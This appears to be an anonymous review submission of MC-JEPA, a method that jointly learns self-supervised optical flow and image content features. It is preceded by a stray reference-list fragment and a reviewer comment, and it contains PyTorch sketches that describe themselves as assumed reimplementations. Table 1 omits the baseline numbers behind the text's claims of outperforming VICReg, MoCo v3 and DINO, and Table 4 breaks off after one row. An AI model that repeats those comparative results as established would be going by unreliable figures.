[17] R. Liu, Z. Wu, S. X. Yu, and S. Lin. The emergence of objectness: Learning zero-shot segmentation from videos. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2021.

[18] F. Locatello, D. Weissenborn, T. Unterthiner, A. Mahendran, G. Heigold, J. Uszkoreit, A. Dosovitskiy, and T. Kipf. Object-centric learning with slot attention. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2020.

[19] J. Mattheus, H. Grobler, and A. M. Abu-Mahfouz. A review of motion segmentation: Approaches and major challenges. In *International Multidisciplinary Information Technology and Engineering Conference (IMITEC)*, November 2020.

[20] N. Mayer, E. Ilg, P. Häusser, P. Fischer, D. Cremers, A. Dosovitskiy, and T. Brox. A large dataset to train convolutional networks for disparity, optical flow, and scene flow estimation. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Las Vegas, June 2016.
9XdLlbxZCC
The proposed method performs on par with or slightly worse than other flow estimation methods on the Sintel and KITTI benchmarks, which does not demonstrate the benefit of the proposed "Joint-Embedding Predictive Architecture". The authors do not give a convincing analysis of this issue.
MC-JEPA: A JOINT-EMBEDDING PREDICTIVE ARCHITECTURE FOR SELF-SUPERVISED LEARNING OF MOTION AND CONTENT FEATURES

Anonymous authors
Paper under double-blind review

ABSTRACT

Self-supervised learning of visual representations has focused on learning content features, which identify and differentiate objects in images and videos but do not capture object motion or location. On the other hand, optical flow estimation is a task that does not involve understanding the content of the images on which it is estimated. We unify the two approaches and introduce MC-JEPA, a joint-embedding predictive architecture and self-supervised learning approach that jointly learns optical flow and content features within a shared encoder, demonstrating that the two associated objectives, optical flow estimation and self-supervised content learning, benefit from each other and thus learn content features that incorporate motion information. The proposed approach achieves performance on par with existing methods on unsupervised optical flow benchmarks, as well as with common self-supervised learning approaches on downstream tasks such as semantic segmentation of images and videos.

1 INTRODUCTION

Self-supervised learning in vision has lately been dominated by approaches that aim at learning content features, i.e., features containing information that allows one to identify and differentiate objects, in images (Chen et al., 2020a; Grill et al., 2020; Chen & He, 2020; Zbontar et al., 2021; Bardes et al., 2022a; Caron et al., 2020; 2021; Zhou et al., 2022; Assran et al., 2022; 2023) or videos (Qian et al., 2021; Recasens et al., 2021; Feichtenhofer et al., 2021; Tong et al., 2022). Most methods focus on learning global features that achieve strong results in tasks such as object classification or action recognition in videos. A more recent trend aims at learning localized features that perform well on local tasks such as detection and segmentation (Xiao et al., 2021; Wang et al., 2021; Hénaff et al., 2021; 2022; Bardes et al., 2022b). However, these methods focus on understanding the content of images and videos and are not able to learn information at the pixel level, such as motion in videos or details in textures. In this paper, we focus on jointly learning motion features, using self-supervised optical flow estimation (Horn & Schunck, 1981) from videos as a pretext task, and content features, with general self-supervised learning. Optical flow captures the motion, or dense pixel correspondence, that occurs between two images, for instance consecutive frames in a video or images from a stereo pair. Estimating it is a fundamental problem in computer vision, whose solution is key to tasks such as visual odometry, depth estimation, and object tracking. Classical approaches cast optical flow estimation as an optimization problem (Horn & Schunck, 1981; Brox et al., 2004), where the objective is to match pixels subject to a smoothness constraint. Approaches based on neural networks and supervised learning (Yu et al., 2016; Ilg et al., 2017; Hui et al., 2018; Sun et al., 2018; Yang & Ramanan, 2019; Zhao et al., 2020; Teed & Deng, 2020; Jiang et al., 2021; Bai et al., 2022) are limited by the difficulty of labelling real-world data, compared to using synthetic data.
Self-supervised methods allow learning from large collections of real-world video data (Ren et al., 2017; Liu et al., 2019b;a; Zhong et al., 2019; Im et al., 2020; Liu et al., 2020; Luo et al., 2021; Jonschkowski et al., 2020; Stone et al., 2021) and offer an alternative that is now competitive with supervised approaches. However, most current methods focus only on motion, without relying on the (semantic) content of the video, a problem that we solve by learning motion and content features at the same time with a multi-task approach.

Figure 1: Multi-task self-supervised learning of content and motion features. MC-JEPA combines a self-supervised feature learning approach and an optical flow estimation approach in a multi-task setup with a single shared encoder. The self-supervised content feature learning objective is trained on ImageNet, and the self-supervised flow estimation task is trained on various video datasets. Our final encoder produces features that carry both motion and content information, and that can be used to estimate optical flow in videos or for content understanding downstream tasks.

Recent techniques learn spatial correspondences between video frames (Jabri et al., 2020; Bian et al., 2022; Xu & Wang, 2021; Tokmakov et al., 2022). The goal is to track the locations of objects and therefore capture content information that optical flow estimation does not. These approaches can be seen as object-level motion estimation. However, they learn features that are very specific to the tracking task, with poor generalization to other visual downstream tasks. Very often, they are trained on small video datasets that are not as diverse as large image datasets such as ImageNet (Deng et al., 2009), which further limits the quality of the learned visual features. A more reliable way to build visual representations is to learn multiple tasks at the same time (Zhang et al., 2021; Girdhar et al., 2022). We thus propose MC-JEPA (Motion-Content Joint-Embedding Predictive Architecture), a method that learns optical flow estimation and content features in a multi-task setting with a shared encoder, using a joint-embedding predictive architecture (LeCun, 2022). Our contributions can be summarized as follows:

• We propose a method for learning self-supervised optical flow from synthetic and real video data, based on PWC-Net (Sun et al., 2018) and improved with several additional components, such as a backward consistency loss and a variance-covariance regularization term. We call this first method M-JEPA.

• We combine M-JEPA in a multi-task setup with VICReg (Bardes et al., 2022a), a self-supervised learning method trained on ImageNet, in order to improve our estimated flow and to produce content features that transfer well to many downstream tasks. Our final method is called MC-JEPA.

• We evaluate MC-JEPA on a range of optical flow benchmarks, such as KITTI 2015 (Menze & Geiger, 2015) and Sintel (Butler et al., 2012), and on image and video segmentation tasks on Cityscapes (Cordts et al., 2016) and DAVIS (Pont-Tuset et al., 2017), and demonstrate strong performance on all these tasks with a single encoder.

We hope that MC-JEPA will be a first step towards self-supervised learning approaches that are based on multi-task learning and joint-embedding architectures, that can be trained on any visual data, images or videos, and that generalize well on a wide range of tasks, from motion prediction tasks to content understanding tasks.

2 RELATED WORK

Self-supervised learning.
The recent advances in self-supervised learning have been mainly driven by the general approach of learning invariances to hand-crafted data augmentations, using a joint-embedding architecture.

Figure 2: **MC-JEPA architecture.** Our method learns motion through optical flow estimation on videos, and content through joint-embedding of views of images, in a multi-task way with a shared encoder. Our optical flow estimation architecture is based on PWC-Net (Sun et al., 2018) and works as follows. Given a pair of consecutive frames $I_t$, $I_{t+1}$ in a video, an encoder produces sets of pyramidal features $\{X^{(l)}_t\}$ and $\{X^{(l)}_{t+1}\}$. The flow is estimated in a coarse-to-fine manner, starting from the lowest-resolution features $X^{(1)}$. A first flow $f^{(2)}_{t,t+1}$ is estimated by the flow estimator network, then used to warp the features $X^{(2)}_t$, which are compared to $X^{(2)}_{t+1}$ with a regression loss. The flow is then iteratively refined at every layer by predicting the residual flow and adding it to the previous-layer flow. The final flow is used to warp $I_t$, and the warped image is compared with $I_{t+1}$ using a reconstruction loss. Forward-backward flow consistency is encouraged with the cycle consistency losses, which minimize the distance between $X^{(l)}_t$ and $f^{(l)}_{t+1,t}(f^{(l)}_{t,t+1}(X^{(l)}_t))$ at every layer. When the encoder is trained in the multi-task setup with a standard self-supervised learning criterion, training is very unstable; this is prevented by the variance-covariance regularization term applied to every feature layer.

Among self-supervised learning methods learning from images, contrastive methods push together concepts that are visually close and push away concepts that are different in the embedding space (Hjelm et al., 2019; Chen et al., 2020a; He et al., 2020; Chen et al., 2020b; Mitrovic et al., 2021; Dwibedi et al., 2021; Chen et al., 2021; Tomasev et al., 2022; Li et al., 2022), clustering methods categorize embeddings into a balanced set of clusters (Caron et al., 2018; 2020; 2021), and non-contrastive methods prevent collapsing solutions either with architectural tricks (Grill et al., 2020; Lee et al., 2021; Chen & He, 2020) or with covariance-based regularization (Ermolov et al., 2021; Zbontar et al., 2021; Bardes et al., 2022a; Garrido et al., 2023b), which is equivalent under some assumptions to contrastive methods (Garrido et al., 2023a). Finally, some methods are based on masking and patch reconstruction (Bao et al., 2022; He et al., 2022; Zhou et al., 2022; Assran et al., 2022; 2023). These methods focus on learning a global representation of the input, which is best suited for classification tasks. Dense self-supervised learning rather focuses on learning local features (Xie et al., 2021; Wang et al., 2021; Xiao et al., 2021; Yang et al., 2021; Wang et al., 2022; Yang et al., 2022; Hénaff et al., 2021; 2022; Chen et al., 2022; Caron et al., 2023), which are best suited for detection and segmentation downstream tasks. The loss functions and methods developed on images have led to the application of similar approaches to videos (Qian et al., 2021; Recasens et al., 2021; Feichtenhofer et al., 2021; Tong et al., 2022; Parthasarathy et al., 2022), with the objective of learning a representation that transfers well on action recognition benchmarks.
**Optical flow estimation.** Classical techniques for optical flow estimation are based on the optimization of a matching term and a smoothness term for a given pair of images, without any kind of learning (Horn & Schunck, 1981; Brox et al., 2004; Sun et al., 2010). Later came methods based on supervised learning and convolutional neural networks, first with generic architectures (Yu et al., 2016; Ilg et al., 2017), then with architectures specifically designed for flow estimation (Ranjan & Black, 2017; Sun et al., 2018; Yang & Ramanan, 2019; Teed & Deng, 2020). Supervised flow estimation is limited to learning with synthetic data, and unsupervised flow estimation is a promising direction towards learning on any video data. Photometric consistency was introduced by (Ren et al., 2017) and is the basis of every unsupervised optical flow estimation method. Additional self-supervision signals can be found with the distillation of reliable matches (Liu et al., 2019b;a), global geometric constraints (Zhong et al., 2019), or data augmentation consistency (Liu et al., 2020; Stone et al., 2021). Fusing multi-layer similarities (Im et al., 2020) and carefully designing the interpolation for upsampling (Luo et al., 2021) further improve the estimated flow quality. Finally, a comprehensive set of additional tricks that help unsupervised optical flow is presented in (Jonschkowski et al., 2020).

**Learning correspondences.** Learning from videos has mostly focused on learning a global representation of a video, but another interesting task is learning spatial correspondences between consecutive frames. A promising direction for learning these correspondences is contrastive random walks (Jabri et al., 2020), which can also be performed at the pixel level (Bian et al., 2022). Correspondences can also be learned at the object level (Xu & Wang, 2021; Patrick et al., 2021) or combined with a memory (Tokmakov et al., 2022) in order to deal with occluded objects. Learning optical flow can be seen as learning correspondences at the pixel level, which is not captured by popular self-supervised learning methods.

**Multi-task learning.** Multi-task learning is commonly used to train an encoder on multiple tasks when the different tasks benefit from each other. Several works use it to learn a shared representation between images and videos (Zhang et al., 2021; Girdhar et al., 2022). However, very few works use multi-task learning for self-supervised learning: the idea was introduced in (Doersch & Zisserman, 2017) and used for anomaly detection tasks in (Georgescu et al., 2021), without much follow-up work. We simply use multi-task learning to learn self-supervised content features and optical flow at the same time with a single shared encoder.

### 3 PROPOSED APPROACH

In this section, we describe our architecture and improvements for self-supervised optical flow estimation with a hierarchical coarse-to-fine approach, the loss functions of our method, our general self-supervised objective and multi-task setup, our data sampling strategy, and a set of tricks for stabilizing training. Section 3.1 introduces our M-JEPA method for optical flow estimation, and Section 3.2 presents how we combine M-JEPA with multi-task learning into our final MC-JEPA method.
#### 3.1 OPTICAL FLOW

Given a pair of RGB images $I_t, I_{t+1} \in \mathbb{R}^{3,H,W}$, the corresponding optical flow is defined by the correspondence map $f \in \mathbb{R}^{2,H,W}$ that, for a given position in $I_t$, gives the position of the corresponding pixel in $I_{t+1}$. The goal is to learn a flow estimator function $F_\theta$ with parameters $\theta$, which outputs the flow for a pair of images, $f = F_\theta(I_t, I_{t+1})$, by training it on a set of image sequences $D = \{\{I^i_t\}_{t=1}^{T}\}_{i=1}^{N}$. Unsupervised flow estimation usually relies on a regression loss, or photometric consistency loss, which ensures that the image $I_t$ warped by the predicted flow $f$ is consistent with $I_{t+1}$, and on a regularizer that encourages $f$ to be smooth. Most methods differ in the way these terms are implemented, in the details of the encoder and flow estimator architectures, and in additional self-supervisory signals.

**Regression and smoothness.** We use the coarse-to-fine hierarchical flow estimator PWC-Net (Sun et al., 2018), which we adapt to work with our custom encoder architecture described in Appendix C. Given features $X^{(l)}_t, X^{(l)}_{t+1} \in \mathbb{R}^{d^{(l)} \times h^{(l)} \times w^{(l)}}$, corresponding to level $l$ of the pyramids for images $I_t$ and $I_{t+1}$, with $l \in \{1, ..., L\}$, we first estimate a flow $f^{(2)}_{t,t+1} = F_\theta(X^{(1)}_t, X^{(1)}_{t+1}, 0)$, then recursively refine this flow at higher and higher resolutions by predicting the residual flow at every layer:

$$f^{(l+1)}_{t,t+1} = F_\theta(X^{(l)}_t, X^{(l)}_{t+1}, f^{(l)}_{t,t+1}). \quad (1)$$

Our estimator $F_\theta(X_t, X_{t+1}, f)$ works as follows. First, the feature map $X_t$ is warped as $\hat{X}_{t+1} = f(X_t)$; then a 4D correlation volume $V = \hat{X}_{t+1}X^T_{t+1}$ is computed and fed to a small convolutional network $g_\phi(V, X_t, \hat{X}_{t+1}, f)$, which predicts the residual flow. We then use a multi-scale loss on the intermediate feature layers of the encoder, defined as follows:

$$L_{reg} = \sum_{l=1}^L \|X^{(l)}_{t+1} - \hat{X}^{(l)}_{t+1}\|_2^2. \quad (2)$$
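For reference, here is a minimal PyTorch sketch of the two core operations of Eqs. (1)-(2): warping a feature map by a flow field and the multi-scale regression loss. The helper names and details such as the sampling and padding modes are our assumptions, not the paper's exact implementation.

```python
import torch
import torch.nn.functional as F

def warp(x: torch.Tensor, flow: torch.Tensor) -> torch.Tensor:
    """Warp feature map x (B,C,H,W) by flow (B,2,H,W), in pixels.

    Samples x at p + flow via bilinear grid_sample; the exact flow-direction
    convention (forward vs backward warping) is an assumption here.
    """
    b, _, h, w = x.shape
    ys, xs = torch.meshgrid(
        torch.arange(h, device=x.device, dtype=x.dtype),
        torch.arange(w, device=x.device, dtype=x.dtype),
        indexing="ij",
    )
    grid_x = xs.unsqueeze(0) + flow[:, 0]  # target x-coordinates
    grid_y = ys.unsqueeze(0) + flow[:, 1]  # target y-coordinates
    # normalize coordinates to [-1, 1] as required by grid_sample
    grid = torch.stack(
        (2.0 * grid_x / max(w - 1, 1) - 1.0,
         2.0 * grid_y / max(h - 1, 1) - 1.0), dim=-1)
    return F.grid_sample(x, grid, align_corners=True, padding_mode="border")

def multiscale_regression_loss(feats_t, feats_t1, flows):
    """L_reg (Eq. 2): l2 distance between warped X_t^(l) and X_{t+1}^(l),
    summed over pyramid levels; inputs are lists of per-level tensors."""
    loss = 0.0
    for x_t, x_t1, f in zip(feats_t, feats_t1, flows):
        loss = loss + ((warp(x_t, f) - x_t1) ** 2).mean()
    return loss
```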
Table 1: **Quantitative results.** Comparison of the performance of our model on: (1) the Sintel (Butler et al., 2012) clean and final and KITTI 2015 (Menze & Geiger, 2015) optical flow estimation benchmarks; (2) the Pascal VOC (Everingham et al., 2010), Cityscapes (Cordts et al., 2016) and ADE20k (Zhou et al., 2019) linear segmentation benchmarks, both frozen and fine-tuned; (3) the DAVIS 2017 (Pont-Tuset et al., 2017) video object segmentation benchmark; against several self-supervised methods, each optimized for a single specific task. EPE is the average end-point error (↓ lower is better). F1 is the average F1 error in % (↓ lower is better). mIoU is the mean intersection-over-union (↑ higher is better). $(J\&F)_m$ is the average of the mean region similarity and the mean contour-based accuracy (↑ higher is better). Flow cells report train EPE / test score; segmentation cells report frozen / fine-tuned mIoU. MC-JEPA is our full model trained in a multi-task way on ImageNet and flow estimation. M-JEPA is our model without content learning, trained only on flow estimation. The best and second best results for each benchmark are **bold** and underlined.

| Method | Backbone | Sintel Clean (train / test EPE) | Sintel Final (train / test EPE) | KITTI 2015 (train EPE / test F1) | Pascal VOC (Frozen / FT) | CityScapes (Frozen / FT) | ADE20k (Frozen / FT) | DAVIS 2017 $(J\&F)_m$ |
|---|---|---|---|---|---|---|---|---|
| Rand. weights | CNX-T | 23.71 / - | 24.02 / - | 24.88 / - | 0.5 / - | - / - | - / - | - |
| *flow methods* | | | | | | | | |
| UFlow (Jonschkowski et al., 2020) | PWC | 2.50 / 5.21 | 3.39 / 6.50 | 2.71 / 11.13 | 7.8 / - | - / - | - / - | - |
| ARFlow (Liu et al., 2020) | PWC | 2.79 / 4.78 | 3.73 / 5.89 | 2.85 / 11.80 | 7.9 / - | - / - | - / - | - |
| UPFlow (Luo et al., 2021) | PWC | 2.33 / 4.68 | 2.67 / 5.32 | 2.45 / 9.38 | 8.8 / - | - / - | - / - | - |
| SMURF (Stone et al., 2021) | RAFT | 1.71 / 3.15 | 2.55 / 4.18 | 2.00 / 8.85 | 10.4 / - | - / - | - / - | - |
| *correspondence methods* | | | | | | | | |
| VFS (Xu & Wang, 2021) | R50 | - | - | - | - / - | - / - | - / - | - |
| MCRW (Bian et al., 2022) | PWC | 2.84 / 5.68 | 3.82 / 6.72 | 2.81 / 11.67 | 39.8 / - | - / - | - / - | - |
| *content methods* | | | | | | | | |
| VICReg (Bardes et al., 2022a) | CNX-T | - | - | - | - / - | - / - | - / - | - |
| VICRegL (Bardes et al., 2022b) | CNX-T | - | - | - | - / - | - / - | - / - | - |
| MoCo v3 (Chen et al., 2021) | ViT-S | - | - | - | - / - | - / - | - / - | - |
| DINO (Caron et al., 2021) | ViT-S | - | - | - | - / - | - / - | - / - | - |
| *ours* | | | | | | | | |
| M-JEPA | CNX-T | 2.98 / - | 3.82 / - | 3.01 / - | 9.4 / - | - / - | - / - | - |
| MC-JEPA | CNX-T | 2.81 / 5.01 | 3.51 / 6.12 | 2.67 / 11.33 | 67.1 / 79.9 | 65.5 / 78.4 | 30.8 / 44.2 | 70.5 |

In addition to the multi-scale regression loss, we use a reconstruction loss on the last layer, at the image level:

$$L_{rec} = d(I_{t+1}, \hat{I}_{t+1}), \quad (3)$$

where $d$ is a linear combination of $l_2$, $l_1$, and SSIM losses. We also use the smoothness regularizer of (Jonschkowski et al., 2020), which constrains the produced flow to be smooth and allows us to deal with repetitive or textureless patterns:

$$L_{smooth} = \sum_{d \in \{x,y\}} \sum_p \exp(-\lambda \nabla_d I) \| \nabla_d f_{t,t+1} \|_1, \quad (4)$$

where $x$ and $y$ are the directions in which the predicted flow is constrained to remain stable when the image gradient does not change significantly.
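A minimal sketch of the first-order edge-aware smoothness term of Eq. (4) could look as follows; the edge-sensitivity value of $\lambda$ used here is purely illustrative.

```python
import torch

def edge_aware_smoothness(img: torch.Tensor, flow: torch.Tensor,
                          lam: float = 150.0) -> torch.Tensor:
    """L_smooth (Eq. 4): penalize flow gradients, down-weighted at image edges.

    img: (B,3,H,W) frame I_t; flow: (B,2,H,W); lam is the edge sensitivity
    (its value here is an illustrative assumption).
    """
    # image gradients, averaged over color channels
    img_dx = (img[:, :, :, 1:] - img[:, :, :, :-1]).abs().mean(1, keepdim=True)
    img_dy = (img[:, :, 1:, :] - img[:, :, :-1, :]).abs().mean(1, keepdim=True)
    # flow gradients along the same directions
    flow_dx = (flow[:, :, :, 1:] - flow[:, :, :, :-1]).abs()
    flow_dy = (flow[:, :, 1:, :] - flow[:, :, :-1, :]).abs()
    # exp(-lam * |grad I|): smoothness is relaxed across strong image edges
    loss_x = (torch.exp(-lam * img_dx) * flow_dx).mean()
    loss_y = (torch.exp(-lam * img_dy) * flow_dy).mean()
    return loss_x + loss_y
```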
**Cycle consistency.** Flow estimation is a non-symmetric operation, as not all pixels of $I_t$ have a correspondence in $I_{t+1}$ and vice versa. For a given pair of images, we estimate both the forward and backward flows. We introduce a cycle-consistency loss that constrains the features $X_t$ warped by $f_{t,t+1}$ and then by $f_{t+1,t}$ to match $X_t$. The loss is defined as follows:

$$L_{cycle} = \sum_{l=1}^L \| X_t^{(l)} - f_{t+1,t}(f_{t,t+1}(X_t^{(l)})) \|_2^2, \quad (5)$$

where $f(X)$ denotes the warping of $X$ by flow $f$. We symmetrize the loss and do the same for $X_{t+1}$. In order to deal with occlusions, we follow (Liu et al., 2019a) and use forward-backward compatibility, applying $L_{reg}$ only to the pixels that have a correspondence in both the forward and the backward flows.

**Variance-covariance regularization.** Finally, in order to regularize the features produced by our encoder, we introduce a variance-covariance regularization loss function (Bardes et al., 2022a), defined as follows:

$$L_{vc} = \sum_{l=1}^{L} \frac{1}{d} \sum_{j=1}^{d} \max\left(0, \gamma - \sqrt{\text{Var}(X_{t,j}^{(l)}) + \epsilon}\right) + \frac{1}{d} \sum_{i \neq j} [C(X_{t}^{(l)})]_{i,j}^2, \quad (6)$$

where Var is the empirical variance and $C$ is the empirical covariance matrix after centering the features. This loss helps stabilize training in the multi-task setup described in Section 3.2, and also improves the performance of the method, as shown in Table 11.

Figure 3: **Qualitative visualization: optical flow.** We compare the results of our complete model (MC-JEPA) and of our model pretrained only on flow (M-JEPA) with ARFlow. The top two rows are from KITTI-15; the bottom two rows are from Sintel clean and Sintel final.

### 3.2 Multi-task self-supervised learning

This section describes how we combine M-JEPA with content learning into our final MC-JEPA method.

**Learning content features.** We follow the literature (Chen et al., 2020a; Grill et al., 2020; Caron et al., 2020; Bardes et al., 2022a) and learn content features by jointly embedding two views of an image, generated using common data augmentations such as random cropping and color jittering. In particular, we use the VICReg objective (Bardes et al., 2022a) and follow its protocol: from a seed image sampled in an unlabelled training dataset $D$, two views are generated, rescaled to a fixed size, fed to the encoder, and mapped to an expander network on which the VICReg loss is applied. The VICReg loss $L_{ssl}$ is similar to Eq. (6), with an additional invariance term ($l_2$ loss) that brings the embeddings of the two views closer to each other; it is minimized over $D$.

**Multi-task learning.** At a given training iteration, we sample a batch of sequences from our video dataset and compute the flow losses, then sample a batch of images from ImageNet and compute our self-supervised learning loss; we then add the two losses and back-propagate the gradients into our encoder, expander, and flow estimator networks. The encoder architecture and weights are shared between the two tasks. We illustrate our approach in Figure 1 (general idea) and Figure 2 (detailed architecture). The final loss function that MC-JEPA optimizes is defined as follows:

$$\sum_{D_1} L_{rec} + L_{reg} + L_{smooth} + L_{cycle} + L_{vc} + \sum_{D_2} L_{ssl}, \quad (7)$$

where $D_1$ is our video-sequence dataset and $D_2$ is our image dataset. The losses are balanced with additional coefficients that we tune carefully. Additional details, including the values we use for these coefficients, are given in Appendix B.
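As a concrete reference, the variance-covariance term of Eq. (6) for a single feature level can be sketched as below; flattening a $(B, C, H, W)$ feature map to $(B \cdot H \cdot W, C)$ before the call is our assumption on how it would be applied to spatial features.

```python
import torch

def variance_covariance_loss(x: torch.Tensor, gamma: float = 1.0,
                             eps: float = 1e-4) -> torch.Tensor:
    """One level of L_vc (Eq. 6). x: (N, d) features, one row per sample."""
    n, d = x.shape
    # variance term: hinge keeps each dimension's std above gamma
    std = torch.sqrt(x.var(dim=0) + eps)
    var_loss = torch.relu(gamma - std).mean()
    # covariance term: push off-diagonal covariances towards zero
    xc = x - x.mean(dim=0)
    cov = (xc.T @ xc) / (n - 1)
    off_diag = cov - torch.diag(torch.diag(cov))
    cov_loss = (off_diag ** 2).sum() / d
    return var_loss + cov_loss
```

In the full loss, this term is computed at every pyramid level and summed, which is what stabilizes the multi-task training described above.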
Figure 4: **Qualitative visualization: video segmentation.** We visualize the segmentation maps obtained with the frozen features learned by MC-JEPA on the video instance tracking task of DAVIS 2017, for several video sequences, at frames t = 1, 10, 25, 50. Frame 1 is given as ground truth; the others are predicted by our model.

### 4 EXPERIMENTS

#### 4.1 DATASETS

Our model is pretrained in a single phase on a set of datasets commonly used for optical flow estimation, as well as on ImageNet-1k (Deng et al., 2009). Our video and flow datasets are KITTI (raw (Geiger et al., 2013), 2012 multiview (Geiger et al., 2012), and 2015 multiview (Menze & Geiger, 2015)), MPI Sintel (Butler et al., 2012) (clean, final, and raw movie), FlyingChairs (Yu et al., 2016), FlyingThings (Mayer et al., 2016), and HD1K (Kondermann et al., 2016). We evaluate the quality of our estimated flow on Sintel clean and final and on KITTI 2015, and compare our model with state-of-the-art methods in self-supervised flow estimation. We evaluate the quality of our features on instance segmentation on Pascal VOC (Everingham et al., 2010), CityScapes (Cordts et al., 2016), and ADE20k (Zhou et al., 2019), in both frozen-linear and fine-tuning evaluations. Finally, we evaluate our model on the DAVIS 2017 (Pont-Tuset et al., 2017) video segmentation and instance tracking benchmark popularized by (Caron et al., 2021).

#### 4.2 MAIN RESULTS

**Optical flow.** We compare the flow estimated by our model with that of several state-of-the-art methods optimized for flow estimation, as well as with MCRW, which discovers the flow by learning contrastive random walks between pixels. Table 1 presents our results, which are on par with UFlow (Jonschkowski et al., 2020), ARFlow (Liu et al., 2020), and UPFlow (Luo et al., 2021), which are all optimized for flow estimation. SMURF (Stone et al., 2021) is better on all the benchmarks, but our goal is not to learn the best possible flow; rather, we use flow estimation as a pretext task for learning general features and motion. We nevertheless outperform MCRW, which shares the same goal. Figure 3 presents our qualitative optical flow results.

**Instance Segmentation.** Table 1 presents the performance of MC-JEPA on various frozen and fine-tuned linear segmentation tasks, which are commonly used to evaluate the quality of the features learned by self-supervised models (Zhou et al., 2022; Bardes et al., 2022b). We outperform MoCo v3 (Chen et al., 2021) and VICReg (Bardes et al., 2022a), the method we use for content feature learning, by a large margin, which indicates that our flow estimation pretext task significantly helps localization. Our results are on par with VICRegL (Bardes et al., 2022b), which is specialized for segmentation, and with DINO (Caron et al., 2021), which has among the best self-supervised features available.

**Video Segmentation.** Finally, we compare the performance of MC-JEPA on the video segmentation and instance tracking task of DAVIS 2017, against VFS (Xu & Wang, 2021) and MCRW (Bian et al., 2022), which are correspondence learning methods, and against DINO. We outperform all these methods, which shows that learning motion through flow estimation is a good way of improving the learning of content features for tasks that require motion information. Figure 4 shows qualitative results on DAVIS 2017.
Overall, our method allows us to train a single model that performs very well on all the above-mentioned tasks, whereas the concurrent works are specialized either for content feature learning or for motion and optical flow estimation.

Table 2: **Ablation: flow datasets.** Impact on performance when varying the set of pretraining datasets. KITTI means pretraining on KITTI raw, 2012 and 2015. Sintel means pretraining on Sintel raw, clean and final. FT/FC are FlyingThings and FlyingChairs. The metric for K15 (KITTI 2015), clean and final is the EPE. ISeg is the linear frozen evaluation on Pascal VOC, in mIoU; VSeg is the evaluation on DAVIS 2017, in $(J\&F)_m$.

| KITTI | Sintel | FT/FC | HD1k | K15 | clean | final | ISeg | VSeg |
|-------|--------|-------|------|------|-------|-------|------|------|
| ✓ | | | | 2.93 | 3.23 | 3.96 | 66.8 | 70.0 |
| | ✓ | | | 3.78 | 2.95 | 3.61 | 66.4 | 69.9 |
| ✓ | ✓ | | | 2.91 | 2.99 | 3.70 | 67.2 | 70.4 |
| ✓ | ✓ | ✓ | | 2.88 | 2.93 | 3.66 | 67.1 | 70.3 |
| ✓ | ✓ | ✓ | ✓ | 2.67 | 2.81 | 3.51 | 67.1 | 70.5 |

Table 3: **Ablation: estimator architecture.** Comparison between different flow estimator sizes and forms of normalization. The size factor scales the number of filters in each convolution of the estimator. LN denotes the use of LayerNorm after every layer of the estimator except the last one. l2 denotes l2-normalization before the last layer of the estimator.

| Factor size | #Params | LN | l2 | K15 | clean | final | ISeg | VSeg |
|-------------|---------|----|----|------|-------|-------|------|------|
| 1 | 2M | | | crashed | | | | |
| 1 | 2M | ✓ | | 2.68 | 2.88 | 3.57 | 67.0 | 70.2 |
| 1 | 2M | | ✓ | 6.21 | 6.04 | 6.99 | 53.2 | 47.9 |
| 1 | 2M | ✓ | ✓ | 4.55 | 4.47 | 5.66 | 62.3 | 63.6 |
| 2 | 8M | ✓ | | 2.67 | 2.81 | 3.51 | 67.1 | 70.5 |

### 4.3 ABLATIONS

We perform many ablations on the components and training procedure of MC-JEPA and evaluate our models on KITTI 2015 train (K15 in tables, metric: EPE), Sintel clean and final (clean and final in tables, metric: EPE), Pascal VOC linear frozen evaluation (ISeg in tables, metric: mIoU), and DAVIS 2017 video segmentation (VSeg in tables, metric: $(J\&F)_m$), which are all relatively fast to perform.

**Flow datasets.** We start by evaluating the effect of varying the set of data used for flow estimation. Table 2 presents our results when incorporating various datasets. As expected, training only on KITTI or only on Sintel offers great performance on the respective evaluation set. Progressively adding FlyingChairs, FlyingThings, and HD1k improves the flow results but has very little influence on the segmentation tasks. The benefit of flow estimation for segmentation is independent of the domain on which the flow estimator is trained.

**Flow estimator architecture.** When pretraining in our multi-task setup with ImageNet, we observed many instabilities related to the gradients and the exploding norm of the estimator, which we describe in Appendix A. We tried several changes to the flow estimator architecture to overcome these issues, namely LayerNorm and l2-normalization. Table 3 presents our results when incorporating these elements, as well as when increasing the size of the estimator. Not regularizing the estimator led to crashed runs. l2-normalization is very inefficient, as it constrains the last layer to directly produce flows in the correct range of values. Using LayerNorm is the best solution and effectively prevents the estimator from exploding norms and gradients. Increasing the size of the estimator marginally improves the results.
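Since the exact placement of LayerNorm in the estimator is only described at a high level ("after every layer except the last one"), the following is an assumed sketch of how such a normalized convolutional block could be built:

```python
import torch
import torch.nn as nn

class ConvLN(nn.Module):
    """Conv + LayerNorm over channels + ReLU, a building block matching the
    'LN after every layer except the last' design (details assumed)."""
    def __init__(self, c_in: int, c_out: int):
        super().__init__()
        self.conv = nn.Conv2d(c_in, c_out, kernel_size=3, padding=1)
        self.norm = nn.LayerNorm(c_out)  # normalizes the channel dimension

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        x = self.conv(x)
        # LayerNorm expects channels last: (B,C,H,W) -> (B,H,W,C) and back
        x = self.norm(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2)
        return torch.relu(x)
```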
**Backbone.** Our backbone is a ConvNeXt-T (Liu et al., 2022); we study the impact of pretraining models with other backbones, in particular ResNet-50 and the backbone of PWC-Net (Sun et al., 2018), which is commonly used by concurrent flow estimation methods. Table 4 presents our results. The original PWC backbone is not suited to learning good content features, and the ResNet-50 results are not as good as the ConvNeXt-T results.

**Data sampling.** We experiment with different strategies for sampling the data. As a simple baseline, we take a model pretrained with self-supervision on ImageNet and train the flow estimator on top of the frozen features, or fine-tune the whole model. We demonstrate the usefulness of multi-task learning by testing various other strategies: we alternate between one epoch of ImageNet learning and one epoch of flow estimation; we alternate between one batch of each; or we sample a batch from each and back-propagate through the sum of the losses. Table 5 presents our results for each strategy. Training the flow estimator on top of frozen features is too hard a constraint, but even with fine-tuning, optimizing the flow estimation task degrades the segmentation performance too much. Alternating between epochs is not optimal; the best solution is to alternate between batches, or even to combine the losses, for optimal flow estimation results.

Table 4: **Ablation: backbone.** Comparison of the performance of MC-JEPA with different backbones.

| Backbone | #Params | K15 | clean | final | ISeg | VSeg |
|--------------|---------|------|-------|-------|------|------|
| PWC-Net | 8M | 2.66 | 2.80 | 3.47 | 14.8 | 10.1 |
